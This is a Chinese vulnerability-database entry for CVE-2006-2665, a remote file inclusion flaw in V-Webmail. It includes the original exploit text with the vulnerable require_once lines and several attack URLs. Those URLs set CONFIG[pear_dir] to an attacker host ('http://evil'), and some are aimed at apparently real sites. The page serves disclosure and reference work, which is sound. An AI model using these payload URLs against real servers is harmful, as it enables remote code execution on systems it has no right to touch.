V-Webmail core.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110334 漏洞类型 输入验证
发布时间 2006-05-25 更新时间 2006-05-30
CVE编号 CVE-2006-2665 CNNVD-ID CNNVD-200605-538
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1827
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-538
|漏洞详情
V-Webmail1.3的includes/mailaccess/pop3/core.php存在PHP远程文件包含漏洞,远程攻击者可借助CONFIG[pear_dir]参数中的URL执行任意PHP代码。
|漏洞EXP
Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil

# milw0rm.com [2006-05-25]
|参考资料

来源:BID
名称:30164
链接:http://www.securityfocus.com/bid/30164
来源:VUPEN
名称:ADV-2006-1989
链接:http://www.frsirt.com/english/advisories/2006/1989
来源:SECTRACK
名称:1016160
链接:http://securitytracker.com/id?1016160
来源:SECUNIA
名称:20297
链接:http://secunia.com/advisories/20297
来源:MILW0RM
名称:1827
链接:http://milw0rm.com/exploits/1827
来源:XF
名称:vwebmail-pop3-file-include(26694)
链接:http://xforce.iss.net/xforce/xfdb/26694